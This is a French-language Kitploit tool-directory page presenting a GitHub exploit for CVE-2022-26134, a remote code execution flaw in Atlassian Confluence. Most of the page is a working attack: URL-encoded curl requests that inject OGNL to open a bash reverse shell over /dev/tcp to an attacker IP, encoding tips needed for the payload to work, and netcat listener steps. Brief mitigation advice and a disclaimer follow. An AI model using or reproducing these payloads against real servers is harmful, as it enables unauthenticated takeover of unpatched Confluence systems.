Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-26134 — Exploitation active de l'application Questions for Confluence d'Atlassian CVE-2022-26134 | Kitploit
Outils/GitHubGitHub/khalidhaimur/cve-2022-26134
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubkhalidhaimur/cve-2022-26134

CVE-2022-26134

Exploitation active de l'application Questions for Confluence d'Atlassian CVE-2022-26134

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploitation active de Confluence CVE-2022-26134

Aperçu

CVE-2022-26134 est une vulnérabilité critique d'exécution de code à distance (RCE) affectant Atlassian Confluence. Cette vulnérabilité permet à des attaquants non authentifiés d'exécuter du code arbitraire en injectant des expressions OGNL dans des points d'accès vulnérables.

Versions affectées

  • Toutes les versions prises en charge d'Atlassian Confluence Server et Data Center antérieures à la version corrigée.

Détails de l'exploit

La commande CURL suivante démontre l'exploitation active de cette vulnérabilité, en utilisant le moteur Nashorn de Java pour exécuter un reverse shell :

root@kitploit:~
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

En apportant ces modifications, nous devons également prendre en compte l'encodage URL. La chaîne de payload dans la preuve de concept n'est pas complètement encodée en URL. Certains caractères (notamment '.', '-' et '/') ne sont pas encodés. Bien que ce ne soit pas toujours le cas, pour cet exploit, cela s'avère important pour le fonctionnement du payload. Si l'un de ces caractères est encodé, le serveur analysera l'URL différemment, et le payload risque de ne pas s'exécuter. Cela signifie que nous ne pouvons pas appliquer l'encodage URL sur l'ensemble du payload une fois que nous l'avons modifié.

root@kitploit:~
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/

Décomposition du payload

  1. ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
    • Utilise le moteur de script Java Nashorn pour évaluer une expression OGNL.
  2. new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
    • Lance un reverse shell se connectant à 10.0.0.28:1270.

Étapes d'exploitation

  1. Configurez un écouteur sur votre machine d'attaque :
    root@kitploit:~
    nc -lvnp 1270
    
  2. Exécutez la commande CURL d'exploit.
  3. En cas d'exploitation réussie, vous recevrez un reverse shell.

Atténuation

  • Atlassian a publié des correctifs de sécurité pour les versions concernées. Il est fortement recommandé de mettre à jour immédiatement vers la dernière version.
  • Restreignez l'accès aux serveurs Confluence depuis des sources non fiables.
  • Surveillez les journaux pour détecter des requêtes suspectes contenant des expressions OGNL.

Références

  • Avis de sécurité Atlassian
  • Détails de CVE-2022-26134

Avertissement

Cette documentation est fournie uniquement à des fins éducatives. L'exploitation non autorisée de systèmes est illégale et peut entraîner de graves conséquences. Obtenez toujours une autorisation appropriée avant d'effectuer des évaluations de sécurité.

Télécharger l’outil